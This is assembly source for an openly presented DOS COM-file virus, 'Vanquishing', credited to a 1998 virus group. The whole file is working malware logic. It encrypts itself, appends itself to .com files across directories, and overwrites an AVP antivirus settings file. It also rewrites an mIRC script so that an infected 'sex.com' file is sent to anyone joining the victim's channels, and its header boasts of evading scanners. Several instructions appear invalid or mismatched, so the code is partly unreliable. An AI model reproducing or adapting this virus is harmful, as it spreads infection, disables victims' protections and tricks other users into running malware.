; Vanquishing by Arsonic ; Type: Direct Action Appending COM infector ; ; Notes: Attempts to Spread VIA Irc Clients by modifying the Script.ini ; to send a file called SEX.COM to everyone who joins a Channel the infected ; person is currently on. ; ; Attempts to patch the avp antivirus. ; ; ; Detection Stats: ; AVP: NOTHING ;FPROT: NOTHING ; TBAV: NOTHING ; db 0e9h,0,0 VANQUISHING_START: call DELTA DELTA: pop bp sub bp,offset DELTA lea si,[bp+ENCRYPTION_START] mov di,si mov cx,VANQUISHING_END - ENCRYPTION_START call CRYPTO jmp ENCRYPTION_START CRYPTO: lodsb ror al,3 not al xor al,byte ptr [bp+KEY] not al rol al,3 stosb loop CRYPTO ret KEY db 0 ENCRYPTION_START: mov di,100h mov cx,3 cmp byte ptr [bp+BUFF_STORE],1 jne BUFF_SEC lea si,[bp+BUFF_THREE_ONE] jmp RESTORE_BUFFER BUFF_SEC: lea si,[bp+BUFF_THREE_TWO] RESTORE_BUFFER: rep movsb mov ah,3ch xor cx,cx lea dx,[bp+AVPSET] int 21h jc FIND_FIRST xchg bx,ax mov ah,40h lea dx,[bp+Patch_Start] mov cx,Patch_End - Patch_Start int 21h mov ah,3eh int 21h FIND_FIRST: mov ah,4dh lea dx,[bp+FILEMASK] FIND_NEXT: call INC_CALL int 21h jnc INFECT mov ah,3bh lea dx,[bp+DOTDOT] int 21h jnc FIND_FIRST mov ah,3ch lea dx,[bp+Script] xor cx,cx int 21h jc CLOSE xchg bx,ax mov ah,40h lea dx,[bp+SCRIPT_LINE_START] mov cx,SCRIPT_LINE_END - SCRIPT_LINE_START int 21h mov ah,3eh int 21h mov ah,3ch lea dx,[bp+SEX] xor cx,cx int 21h xchg bx,ax mov ax,4200h xor cx,cx xor dx,dx int 21h mov ah,40h lea dx,[bp+BYTES_START] mov cx,BYTES_END - BYTES_START int 21h mov ax,4202h xor cx,cx xor dx,dx int 21h mov ah,40h lea dx,[bp+VANQUISHING_START] mov cx,VANQUISHING_END - VANQUISHING_START int 21h mov ah,3eh int 21h CLOSE: mov di,100h jmp di INFECT: mov ax,4301h mov dx,9eh xor cx,cx int 21h mov ax,3d02h mov dx,9eh int 21h xchg bx,ax mov ah,3fh lea dx,[bp+TEMP_ONE] mov cx,3 int 21h mov ax,word ptr[80h + 1ah] sub ax,VANQUISHING_END - VANQUISHING_START + 3 cmp ax,word ptr[bp+TEMP_ONE+1] je CLOSE_FILE mov ax,word ptr[80h + 1ah] sub ax,3 mov word ptr[bp+TEMP_TWO+1],ax mov ax,4200h xor cx,cx xor dx,dx int 21h mov ah,3fh lea dx,[bp+TEMP_TWO] mov cx,3 call INC_CALL int 21h call RANDOM_LOC mov ax,4202h xor cx,cx xor dx,dx int 21h call SNAG_KEY mov ah,3fh lea dx,[bp+VANQUISHING_START] mov cx,ENCRYPTION_START - VANQUISHING_START call INC_CALL int 21h lea si,[bp+ENCRYPTION_START] lea di,[bp+VANQUISHING_END] mov cx,VANQUISHING_END - ENCRYPTION_START call CRYPTO mov ah,3fh lea dx,[bp+VANQUISHING_END] mov cx,VANQUISHING_END - ENCRYPTION_START call INC_CALL int 21h CLOSE_FILE: mov ah,3eh int 21h mov ah,4eh jmp FIND_NEXT INC_CALL: inc ah ret SNAG_KEY: in al,40h mov byte ptr [bp+KEY],al ret RANDOM_LOC: mov ah,2ch int 21h cmp dh,30 ja SEC_LOC FIR_LOC: mov byte ptr [bp+BUFF_THREE_ONE],byte ptr [bp+TEMP_TWO] mov byte ptr [bp+BUFF_THREE_TWO],byte ptr [bp+TEMP_ONE] mov byte ptr [bp+TEMP_TWO],0 mov byte ptr [bp+TEMP_ONE],0 mov byte ptr [bp+BUFF_STORE],2 ret SEC_LOC: mov byte ptr [bp+BUFF_THREE_ONE],byte ptr [bp+TEMP_ONE] mov byte ptr [bp+BUFF_THREE_TWO],byte ptr [bp+TEMP_TWO] mov byte ptr [bp+TEMP_TWO],0 mov byte ptr [bp+TEMP_ONE],0 mov byte ptr [bp+BUFF_STORE],1 ret SCRIPT_LINE_START: db '[script]',13,10 db 'n0=on 1:JOIN:#:/dcc send $nick C:\mirc\sex.com',13,10 SCRIPT_LINE_END: PATCH_START: db 'KERNEL.AVC',13,10 db 'TROJAN.AVC',13,10 db 'UNPACK.AVC',13,10 db 'EXTRACT.AVC',13,10 db 'MAIL.AVC',13,10 db 'EICAR.AVC',13,10 db 'MACRO.AVC',13,10 PATCH_END: BYTES_START: nop nop nop BYTES_END: AVPSET DB 'c:\avp\avp.set',0 BUFF_THREE_ONE db 0e9h,0,0 BUFF_THREE_TWO db 0cdh,20h,0 FILEMASK db '*.com',0 BUFF_STORE db 2 TEMP_ONE db 0 TEMP_TWO db 0 DOTDOT db '..',0 VANQ db ' [VANQUISHING] [BY ARSONIC] [CODEBREAKERS 98] ' SEX db 'c:\mirc\sex.com',0 SCRIPT db 'c:\mirc\script.ini',0 VANQUISHING_END: